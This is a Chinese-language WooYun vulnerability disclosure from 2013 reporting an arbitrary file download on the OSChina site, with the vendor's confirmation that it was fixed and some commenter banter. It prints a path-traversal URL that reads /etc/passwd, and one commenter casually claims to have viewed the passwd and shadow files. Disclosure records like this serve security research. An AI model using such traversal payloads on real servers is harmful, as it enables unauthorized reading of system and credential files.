当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046809

漏洞标题:开源中国社区任意文件下载

相关厂商:开源中国

漏洞作者: 帽子白白

提交时间:2013-12-23 15:24

修复时间:2014-02-06 15:25

公开时间:2014-02-06 15:25

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向核心白帽子及相关领域专家公开
2014-01-12: 细节向普通白帽子公开
2014-01-22: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

任意文件下载

详细说明:

用户登录后访问如下地址可直接下载passwd等任意文件
http://www.oschina.net/code/download_src?file=../../../../../etc/passwd

漏洞证明:

null

ba.png

修复方案:

null

版权声明:转载请注明来源 帽子白白@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-12-23 16:15

厂商回复:

在一个废弃的功能上的确存在此问题,已修复,非常感谢报告!

最新状态:

2014-02-07:该漏洞早已解决,怎么现在还通知呢


漏洞评价:

评论

  1. 2013-12-23 15:57 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @红薯 是乌龙?还是@红薯 菊花被爆,敬请等待该漏洞公开。

  2. 2013-12-23 16:01 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    撸主,别忘了分享裤子

  3. 2013-12-23 16:42 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @蟋蟀哥哥 菊花

  4. 2013-12-23 21:37 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @小胖胖要减肥 呵呵。。还好,只看了passwd文件和shadow文件。。